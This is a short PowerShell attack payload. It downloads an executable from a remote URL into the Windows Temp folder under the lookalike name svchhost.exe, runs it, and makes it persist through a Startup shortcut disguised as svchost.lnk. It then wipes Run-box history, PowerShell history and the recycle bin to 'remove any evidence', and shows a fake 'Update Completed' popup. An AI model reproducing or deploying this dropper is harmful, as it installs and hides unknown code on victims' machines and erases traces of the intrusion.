#powershell 
# Script to perform the tasks without UAC elevation

# Step 1: Create the directory C:\Windows\Temp\Cache
try {
    mkdir "$env:windir\temp\Cache" -ErrorAction Stop
    Write-Host "Directory C:\Windows\Temp\Cache created successfully."
} catch {
    Write-Host "Failed to create directory: $_"
}

# Step 2: Skip the Windows Defender exclusion since it requires elevated privileges

# Step 3: Download the file from Dropbox to C:\Windows\Temp\Cache
try {
    $hookurl = "$dc"
    Invoke-WebRequest -Uri $hookurl -OutFile "$env:windir\temp\Cache\svchhost.exe" -ErrorAction Stop
    Write-Host "File downloaded successfully to C:\Windows\Temp\Cache."
} catch {
    Write-Host "Failed to download file: $_"
}

# Step 4: Execute the downloaded file
try {
    Start-Process "$env:windir\temp\Cache\svchhost.exe" -ErrorAction Stop
    Write-Host "svchhost.exe executed successfully."
} catch {
    Write-Host "Failed to execute svchhost.exe: $_"
}

# Step 5: Create a shortcut to the executable in the startup folder
try {
    $s=(New-Object -COM WScript.Shell).CreateShortcut("$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk")
    $s.TargetPath="$env:windir\temp\Cache\svchhost.exe"
    $s.Save()
    Write-Host "Shortcut created successfully in Startup folder."
} catch {
    Write-Host "Failed to create shortcut: $_"
}
###########################################################################################################################################################

<#
.NOTES 
	This is to clean up behind you and remove any evidence to prove you were there
#>

# Delete contents of Temp folder 

#rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue

# Delete run box history

reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

# Delete powershell history

Remove-Item (Get-PSreadlineOption).HistorySavePath

# Deletes contents of recycle bin

Clear-RecycleBin -Force -ErrorAction SilentlyContinue

		
############################################################################################################################################################

# Popup message to signal the payload is done

$done = New-Object -ComObject Wscript.Shell;$done.Popup("Update Completed",1)

